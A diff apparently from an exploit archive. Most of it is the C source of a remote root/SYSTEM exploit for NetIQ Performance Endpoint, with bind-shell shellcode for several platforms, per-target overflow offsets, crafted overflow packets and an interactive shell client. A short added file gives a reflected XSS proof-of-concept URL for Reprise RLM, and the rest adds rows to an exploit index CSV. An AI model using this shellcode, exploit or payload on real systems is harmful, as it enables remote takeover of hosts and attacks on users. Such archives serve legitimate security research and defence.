"\x12\xbf\xff\xfc\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a" + "\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08" + "\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b" + "\x91\xd0\x20\x08"; + +static char solaris_x86_bind[] = + "\xb8\xff\xff\xff\xff\xba\xfd\xff\xd8\xef\xf7\xd0\xf7\xd2\x50\x52" + "\x89\xe7\x31\xdb\xf7\xe3\xb0\x02\x50\x52\x52\x50\x50\x50\xb0\xe6" + "\xcd\x91\x93\x6a\x10\x57\x53\x52\xb0\xe8\xcd\x91\x52\x53\x52\xb0" + "\xe9\xcd\x91\x52\x53\x6a\x02\xb0\xea\xcd\x91\x93\x92\x99\x59\x51" + "\x52\xb0\x06\xcd\x91\x51\x6a\x09\x53\x52\xb0\x3e\xcd\x91\x83\xc4" + "\x18\x49\x79\xeb\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" + "\xe3\x52\x53\x89\xe1\x52\x52\x51\x53\x52\xb0\x3b\xcd\x91"; + +#define NUM_TARGETS 7 + +#define ARCH_X86 0 +#define ARCH_SPARC 1 + +struct target_t +{ + const char *name; + const char *zshell; + const int zshell_len; + const int zshell_pkt_len; + const int fp_indx; + const int fp_offset; + const int arch; +}; + +struct target_t targets[] = { + { "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)", + win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 }, + { "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)", + win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 }, + { "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)", + win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 }, + { "NetIQ Endpoint 5.1 - Microsoft Windows (universal)", + win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 }, + { "NetIQ Endpoint 5.1 - FreeBSD (universal)", + freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 }, + { "NetIQ Endpoint 5.1 - Solaris SPARC (universal)", + solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC }, + { "NetIQ Endpoint 5.1 - Solaris x86 (universal)", + solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 }, + {0} +}; + +static const char *quotes[] = { + " \"No executable code (like Java or Visual Basic) is sent. There is no way\n" + " to do something like 'run this command.' 100,000’s of endpoints have been\n" + " installed worldwide without incident.\"", + " \"Endpoints do rigorous internal validation. For example, endpoints are not\n" + " susceptible to 'buffer overrun' attacks used by hackers.\"" +}; + +static int verbose = 1; /* verbosity */ +static int ppid, cpid; /* parent and child process id's */ + +static int get_localip_getifaddrs (in_addr_t *); +static int sock_send (int, char *, int); +static int sock_recv (int, char *, int); +static int sock_recv_str (int, char *, int); +static void shellami (int); + +static void +fatal (void) +{ + kill (0, SIGKILL); + exit (EXIT_FAILURE); +} + +static int +get_localip_getifaddrs (in_addr_t *ip_addr) +{ + struct ifaddrs *ifa_head; + int result; + + result = -1; + if (getifaddrs (&ifa_head) == 0) + { + struct ifaddrs *ifa_cur; + + for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next) + { + if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL) + { + if (ifa_cur->ifa_addr->sa_family != AF_INET || + !(ifa_cur->ifa_flags & IFF_UP)) + continue; + if (ifa_cur->ifa_flags & IFF_LOOPBACK) + continue; + + memcpy (ip_addr, + &((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr, + sizeof *ip_addr); + result = 0; + break; + } + } + + freeifaddrs (ifa_head); + } + + return (result); +} + +static int +sock_send (int fd, char *src, int len) +{ + int n; + if ((n = send (fd, src, len, 0)) < 0) + { + perror ("send()"); + exit (EXIT_FAILURE); + } + + return (n); +} + +static int +sock_recv (int fd, char *dst, int len) +{ + int n; + if ((n = recv (fd, dst, len, 0)) < 0) + { + perror ("recv()"); + exit (EXIT_FAILURE); + } + + return (n); +} + +static int +sock_recv_str (int fd, char *dst, int len) +{ + int n = sock_recv (fd, dst, len - 1); + dst[n] = '\0'; + return (n); +} + +static void +shellami (int fd) +{ + int n; + fd_set rset; + char rbuf[1024]; + + while (1) + { + FD_ZERO (&rset); + FD_SET (fd, &rset); + FD_SET (STDIN_FILENO, &rset); + + if (select (fd + 1, &rset, NULL, NULL, NULL) < 0) + { + perror ("select()"); + fatal (); + } + + if (FD_ISSET (fd, &rset)) + { + if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0) + { + fprintf (stderr, "Connection closed by foreign host.\n"); + exit (EXIT_SUCCESS); + } + printf ("%s", rbuf); + fflush (stdout); + } + if (FD_ISSET (STDIN_FILENO, &rset)) + { + if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0) + { + rbuf[n] = '\0'; + sock_send (fd, rbuf, n); + } + } + } +} + +static int +sockami (char *host, int port) +{ + struct sockaddr_in address; + struct hostent *hp; + int fd; + + fflush (stdout); + if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1) + { + perror ("socket()"); + exit (EXIT_FAILURE); + } + + if ((hp = gethostbyname (host)) == NULL) + { + perror ("gethostbyname()"); + exit (EXIT_FAILURE); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); + address.sin_family = AF_INET; + address.sin_port = htons (port); + + if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0) + { + perror ("connect()"); + return (-1); + } + + return (fd); +} + +int +endpt_add_string (char *buf, char *str) +{ + unsigned int str_len; + unsigned short str_lens; + + assert (buf != NULL && str != NULL); + + str_len = 2 + strlen (str) + 1; + str_lens = htons (str_len); + + /* add the string length and copy, including NULL */ + *((unsigned short *) buf) = str_lens; + memcpy (buf + 2, str, str_len - 2); + + return (str_len); +} + +char * +endpt_read_packet (int fd, char *buf) +{ + unsigned short pkt_len; + int n; + + n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len); + if (n < 2) + { + fprintf (stderr, "endpt_read_packet: failed reading length!\n"); + return (NULL); + } + + pkt_len = ntohs (pkt_len); + if (pkt_len > ENDPT_PKTMAX) + { + fprintf (stderr, "endpt_read_packet: invalid packet length!\n"); + return (NULL); + } + + n = sock_recv (fd, buf, pkt_len - 2); + if (n < pkt_len - 2) + { + fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)!\n", n, pkt_len); + return (NULL); + } + + return (buf); +} + +char * +endpt_create_packet (char *buf, unsigned int len) +{ + char *pkt_buf; + unsigned int pkt_len; + unsigned short pkt_lens; + + assert (buf != NULL && len > 0); + assert (len <= UINT_MAX - 2); + assert (len <= ENDPT_PKTMAX - 2); + + pkt_len = 2 + len; + pkt_buf = malloc (pkt_len * sizeof (char)); + if (pkt_buf == NULL) + return (NULL); + + pkt_lens = htons (pkt_len); + + /* add the packet length and copy */ + *((unsigned short *) pkt_buf) = pkt_lens; + memcpy (pkt_buf + 2, buf, len); + + return (pkt_buf); +} + +void +endpt_listen_child (char *thost, struct target_t *trgt) +{ + struct sockaddr_in servaddr, cliaddr; + char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr; + unsigned int var_30_ptr; + int lfd, cfd, sfd, pid; + socklen_t clilen; + + sleep (1); + pid = getpid (); + + if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) + { + perror ("socket()"); + fatal (); + } + + memset (&servaddr, 0, sizeof servaddr); + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = htonl (INADDR_ANY); + servaddr.sin_port = htons (ENDPT_TCP_PORT); + + if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0) + { + perror ("bind()"); + fatal (); + } + + if (listen (lfd, 2) < 0) + { + perror ("listen()"); + fatal (); + } + + clilen = sizeof cliaddr; + if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0) + { + perror ("accept()"); + fatal (); + } + + printf ("[child-%d] connection accepted from %s:%d\n", + pid, inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port)); + + printf ("[child-%d] reading first packet...", pid); + + /* read dummy packet */ + if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) + { + close (cfd); + fatal (); + } + printf ("done\n"); + + printf ("[child-%d] sending first reply...", pid); + pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1); + + sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2); + free (pkt_ptr); + printf ("done\n"); + + printf ("[child-%d] reading second packet...", pid); + + /* read dummy packet */ + if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) + { + close (cfd); + fatal (); + } + printf ("done\n"); + + printf ("[child-%d] reading third packet...", pid); + + if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) + { + close (cfd); + fatal (); + } + memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr); + printf ("done\n"); + + printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr); + + memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr); + + printf ("[child-%d] reading fourth packet...", pid); + + /* read dummy packet */ + if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) + { + close (cfd); + fatal (); + } + printf ("done\n"); + + printf ("[child-%d] reading fifth packet...", pid); + + if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) + { + close (cfd); + fatal (); + } + memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr); + printf ("done\n"); + + printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr); + + memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr); + + printf ("[child-%d] sending second reply...", pid); + pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1); + + sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2); + free (pkt_ptr); + printf ("done\n"); + + printf ("[child-%d] sending evil buffer...", pid); + + ptr = pkt_buf; + if (trgt->arch == ARCH_X86) + { + memcpy (ptr, x86_evil_len, sizeof x86_evil_len); + ptr += sizeof x86_evil_len - 1; + memset (ptr, X86_NOP_BYTE, 0x11c0 - 2); + } + else if (trgt->arch == ARCH_SPARC) + { + int i; + + for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1) + memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len); + + for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1) + memcpy (ptr, sparc_nop, sizeof sparc_nop); + } + else + { + fprintf (stderr, "opps\n"); + exit (EXIT_FAILURE); + } + + memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1); + sock_send (cfd, pkt_buf, trgt->zshell_pkt_len); + printf ("done\n"); + + printf ("[child-%d] sending hammer buffer...", pid); + + ptr = pkt_buf; + memcpy (ptr, hammer_buf, sizeof hammer_buf); + memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr); + if (trgt->arch == ARCH_SPARC) + var_30_ptr = ntohl (var_30_ptr); + + var_30_ptr -= trgt->fp_offset - 0x08; + + if (trgt->arch == ARCH_SPARC) + var_30_ptr = htonl (var_30_ptr); + + memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr); + sock_send (cfd, pkt_buf, sizeof hammer_buf - 1); + printf ("done\n"); + + printf ("[child-%d] waiting for the shellcode to be executed...\n", pid); + sleep (3); + if ((sfd = sockami (thost, PORT_SHELL)) != -1) + { + printf ("+Wh00t!\n\n"); + shellami (sfd); + } + + sleep (1); + close (cfd); +} + +void +endpt_parent (char *thost) +{ + struct in_addr ip_addr; + char ip_buf[IPV4_BUFLEN], pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr; + int fd; + + get_localip_getifaddrs (&ip_addr.s_addr); + strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf); + ip_buf[sizeof ip_buf - 1] = '\0'; + + if (verbose) + fprintf (stderr, "[parent-%d] source address %s\n", ppid, ip_buf); + + fflush (stdout); + + printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT); + if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0) + fatal (); + printf ("done\n"); + + printf ("[parent-%d] building first packet...", ppid); + + ptr = pkt_buf; + memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1); + ptr += sizeof ppkt_buf1 - 1; + + /* add the connect-back IP */ + ptr += endpt_add_string (ptr, ip_buf); + + memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end); + ptr += sizeof ppkt_buf1_end - 1; + + pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf); + printf ("done\n"); + + sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); + free (pkt_ptr); + + printf ("[parent-%d] building second packet...", ppid); + + ptr = pkt_buf; + memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2); + ptr += sizeof ppkt_buf2 - 1; + + /* add the connect-back IP */ + ptr += endpt_add_string (ptr, ip_buf); + + memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end); + ptr += sizeof ppkt_buf2_end - 1; + + pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf); + printf ("done\n"); + + sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); + + printf ("[parent-%d] building third packet...done\n", ppid); + sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); + free (pkt_ptr); + + sleep (2); + printf ("[parent-%d] closing socket...done\n", ppid); + close (fd); +} + +int +main (int argc, char **argv) +{ + struct target_t *trgt; + int i, cret; + + printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + if (argc <= 2) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + + for (i = 0; targets[i].name; i++) + fprintf (stderr, "\t%d) %s\n", i, targets[i].name); + fprintf (stderr, "\n"); + + exit (EXIT_SUCCESS); + } + + if (atoi (argv[2]) >= NUM_TARGETS) + { + fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS); + exit (EXIT_SUCCESS); + } + + trgt = &targets[atoi (argv[2])]; + printf ("Target: %s\n\n", trgt->name); + + srand (time (NULL)); + printf ("%s\n\t- https://tinyurl.com/lgmblyj\n\n", quotes[rand() & 1]); + + ppid = getpid (); + if ((cpid = fork ()) < 0) + { + perror ("fark()"); + exit (EXIT_FAILURE); + } + else if (cpid == 0) + { + /* child */ + endpt_listen_child (argv[1], trgt); + exit (EXIT_SUCCESS); + } + + /* parent */ + endpt_parent (argv[1]); + + /* wait for child */ + wait (&cret); + if (verbose) + fprintf (stderr, "[parent-%d] child-%d exited %d\n", ppid, cpid, cret); + + return (EXIT_SUCCESS); +} \ No newline at end of file diff --git a/exploits/windows/webapps/51188.txt b/exploits/windows/webapps/51188.txt new file mode 100644 index 000000000..a91345743 --- /dev/null +++ b/exploits/windows/webapps/51188.txt @@ -0,0 +1,16 @@ +# Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS) +# Exploit Author: Mohammed A.Siledar +# Author Company : reprisesoftware +# Version: rlm.v14.2BL4 +# Vendor home page : https://reprisesoftware.com +# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe +# Authentication Required: No +# CVE : CVE-2022-30519 +# Tested on: Windows 10 + +# Proof Of Concept: + +http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E + + +Best Regards. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 185964144..abd303085 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -1813,6 +1813,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48124,exploits/aspx/webapps/48124.txt,"DotNetNuke 9.5 - Persistent Cross-Site Scripting",2020-02-24,"Sajjad Pourali",webapps,aspx,,2020-02-24,2020-02-24,0,,,,,http://www.exploit-db.comDNN_Platform_9.5.0_Install.zip, 43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,,2017-12-27,2017-12-28,0,,,,,, 45577,exploits/aspx/webapps/45577.txt,"Ektron CMS 9.20 SP2 - Improper Access Restrictions",2018-10-10,alt3kx,webapps,aspx,,2018-10-10,2018-10-10,0,CVE-2018-12596,,,,, +51200,exploits/aspx/webapps/51200.txt,"ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)",2023-04-01,"Rob_ CTRL Group",webapps,aspx,,2023-04-01,2023-04-01,0,CVE-2022-35543,,,,, 44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,,2018-06-04,2018-06-05,0,CVE-2018-11628,,,,, 49508,exploits/aspx/webapps/49508.txt,"H8 SSRMS - 'id' IDOR",2021-02-01,"Mohammed Farhan",webapps,aspx,,2021-02-01,2021-02-01,0,,,,,, 42687,exploits/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,aspx,,2017-09-13,2017-09-13,0,,,,,, @@ -3624,6 +3625,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41895,exploits/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,remote,hardware,,2017-04-19,2017-04-19,1,,"Command Injection",,,,https://github.com/rapid7/metasploit-framework/blob/3b38d0d9005255a8a06522bd0505eeab95aace5a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb 38663,exploits/hardware/remote/38663.txt,"Huawei HG630a / HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",remote,hardware,,2015-11-10,2017-11-10,0,OSVDB-130098,,,,, 9503,exploits/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",remote,hardware,,2009-08-23,,1,OSVDB-56875,,,,, +51190,exploits/hardware/remote/51190.txt,"Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion",2023-04-01,LiquidWorm,remote,hardware,,2023-04-01,2023-04-01,0,,,,,, 19538,exploits/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],remote,hardware,,1999-10-05,2012-07-02,1,CVE-1999-0791;OSVDB-1100,,,,,https://www.securityfocus.com/bid/695/info 27706,exploits/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",remote,hardware,,2013-08-19,2013-08-19,0,CVE-2013-0526;OSVDB-96389,,,,, 44048,exploits/hardware/remote/44048.md,"Ichano AtHome IP Cameras - Multiple Vulnerabilities",2017-12-19,SecuriTeam,remote,hardware,,2018-02-15,2018-02-15,0,CVE-2017-17761,,,,,https://blogs.securiteam.com/index.php/archives/3576 @@ -3764,6 +3766,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,remote,hardware,,2017-02-03,2017-02-03,0,,,,,, 19444,exploits/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 - Command Execution",1999-08-05,"Stefan Lauda",remote,hardware,,1999-08-05,2017-11-15,1,CVE-1999-0913;OSVDB-47,,,,,https://www.securityfocus.com/bid/564/info 9658,exploits/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",remote,hardware,,2009-09-13,,1,,,,,, +51195,exploits/hardware/remote/51195.py,"Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Yerodin Richards",remote,hardware,,2023-04-01,2023-04-01,0,CVE-2022-44149,,,,, 25966,exploits/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution",2005-07-12,"Kevin Finisterre",remote,hardware,,2005-07-12,2013-06-05,1,CVE-2005-2277;OSVDB-17853,,,,,https://www.securityfocus.com/bid/14232/info 1081,exploits/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client",2005-07-03,"Kevin Finisterre",remote,hardware,,2005-07-02,,1,OSVDB-17852;CVE-2005-2250,,,,, 22533,exploits/hardware/remote/22533.txt,"Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading",2003-04-24,"Jonas Eriksson",remote,hardware,,2003-04-24,2012-11-07,1,,,,,,https://www.securityfocus.com/bid/7426/info @@ -3888,6 +3891,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",remote,hardware,,2013-04-24,2015-10-19,1,CVE-2013-2645;OSVDB-92547,,,,,https://www.securityfocus.com/bid/59442/info 38308,exploits/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",remote,hardware,,2013-02-08,2016-09-12,1,,,,,,https://www.securityfocus.com/bid/57877/info 36945,exploits/hardware/remote/36945.txt,"TP-Link TL-WR740N 111130 - 'ping_addr' HTML Injection",2012-03-12,l20ot,remote,hardware,,2012-03-12,2015-05-08,1,OSVDB-80038,,,,,https://www.securityfocus.com/bid/52424/info +51192,exploits/hardware/remote/51192.py,"TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Tobias Müller",remote,hardware,,2023-04-01,2023-04-01,0,CVE-2022-48194,,,,, 46678,exploits/hardware/remote/46678.py,"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow",2019-04-09,"Grzegorz Wypych",remote,hardware,80,2019-04-09,2019-04-09,0,CVE-2019-6989,,,,, 48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,,2020-11-05,2020-11-05,0,CVE-2017-13772,,,,, 34184,exploits/hardware/remote/34184.txt,"Trend Micro Interscan Web Security Virtual Appliance - Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",remote,hardware,,2010-06-14,2014-07-28,1,,,,,,https://www.securityfocus.com/bid/41072/info @@ -4336,6 +4340,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48972,exploits/hardware/webapps/48972.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot",2020-10-29,"Mohammed Farhan",webapps,hardware,,2020-10-29,2020-10-29,0,,,,,, 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware,,2021-03-25,2021-03-25,0,,,,,, 37258,exploits/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams - Remote File Disclosure",2015-06-10,"Viktor Minin",webapps,hardware,,2015-06-10,2015-06-10,0,OSVDB-123189,,,,, +51179,exploits/hardware/webapps/51179.txt,"GeoVision Camera GV-ADR2701 - Authentication Bypass",2023-04-01,"Chan Nyein Wai",webapps,hardware,,2023-04-01,2023-04-01,0,,,,,, 50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - Local FIle Inclusion",2021-08-17,"Ken Pyle",webapps,hardware,,2021-08-17,2021-10-29,0,,,,,, 45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,,2018-07-22,2018-07-23,0,,Traversal,,,, 44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80,2018-07-02,2018-07-02,0,,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt45000/screen-shot-2018-07-02-at-115352.png,, @@ -5253,6 +5258,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44422,exploits/java/local/44422.py,"H2 Database - 'Alias' Arbitrary Code Execution",2018-04-09,gambler,local,java,,2018-04-09,2018-04-09,1,,,,,http://www.exploit-db.comh2-2017-06-10.zip,https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,,2021-01-06,2021-01-08,1,,,,,, 42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,remote,java,,2017-06-29,2017-06-30,1,CVE-2016-3088,,,,http://www.exploit-db.comapache-activemq-5.11.1-bin.zip,https://github.com/rapid7/metasploit-framework/blob/43d8c4c5e7450d46eba2f18e6e0b6ba70c6dc671/modules/exploits/multi/http/apache_activemq_upload_jsp.rb +51183,exploits/java/remote/51183.txt,"AD Manager Plus 7122 - Remote Code Execution (RCE)",2023-04-01,"Chan Nyein Wai",remote,java,,2023-04-01,2023-04-01,0,CVE-2021-44228,,,,, 39643,exploits/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,remote,java,8080,2016-03-31,2016-03-31,1,CVE-2016-0710;CVE-2016-0709,"Metasploit Framework (MSF)",,,, 50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",2021-12-14,kozmer,remote,java,,2021-12-14,2021-12-15,0,CVE-2021-44228,,,,, 50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",2021-12-14,leonjza,remote,java,,2021-12-14,2021-12-14,0,CVE-2021-44228,,,,, @@ -6860,6 +6866,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19517,exploits/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",local,linux,,2012-07-01,2015-07-12,0,OSVDB-83766,,,,http://www.exploit-db.comemesene_2.12.3-dfsg-1ubuntu1_all.deb, 34537,exploits/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation",2010-08-26,"Micha Riser",local,linux,,2010-08-26,2019-03-28,1,CVE-2010-3073;OSVDB-68076,,,,,https://www.securityfocus.com/bid/42779/info 9627,exploits/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Framework",2009-09-10,spender,local,linux,,2009-09-09,,1,,,2009-enlightenment.tgz,,, +51180,exploits/linux/local/51180.txt,"Enlightenment v0.25.3 - Privilege escalation",2023-04-01,nu11secur1ty,local,linux,,2023-04-01,2023-04-01,0,CVE-2022-37706,,,,, 1029,exploits/linux/local/1029.c,"ePSXe 1.6.0 - 'nogui()' Local Privilege Escalation",2005-06-04,Qnix,local,linux,,2005-06-03,2017-11-16,1,OSVDB-17145,,,,, 19602,exploits/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",local,linux,,1999-11-05,2012-07-05,1,OSVDB-83789,,,,,https://www.securityfocus.com/bid/774/info 22190,exploits/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow",2003-01-21,"Karol Wiesek",local,linux,,2003-01-21,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/6658/info @@ -8767,6 +8774,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46629,exploits/linux/webapps/46629.txt,"CentOS Web Panel 0.9.8.789 - NameServer Field Persistent Cross-Site Scripting",2019-03-29,DKM,webapps,linux,,2019-03-29,2019-03-29,0,CVE-2019-10261,"Cross-Site Scripting (XSS)",,,, 46669,exploits/linux/webapps/46669.txt,"CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting",2019-04-08,DKM,webapps,linux,,2019-04-08,2019-05-01,0,CVE-2019-10893,"Cross-Site Scripting (XSS)",,,, 46784,exploits/linux/webapps/46784.txt,"CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting",2019-05-01,DKM,webapps,linux,,2019-05-01,2019-05-01,0,CVE-2019-11429,"Cross-Site Scripting (XSS)",,,, +51194,exploits/linux/webapps/51194.txt,"Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)",2023-04-01,"numan türle",webapps,linux,,2023-04-01,2023-04-01,0,CVE-2022-44877,,,,, 48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,,2020-03-13,2020-03-18,0,CVE-2020-10230,,,,, 41676,exploits/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection 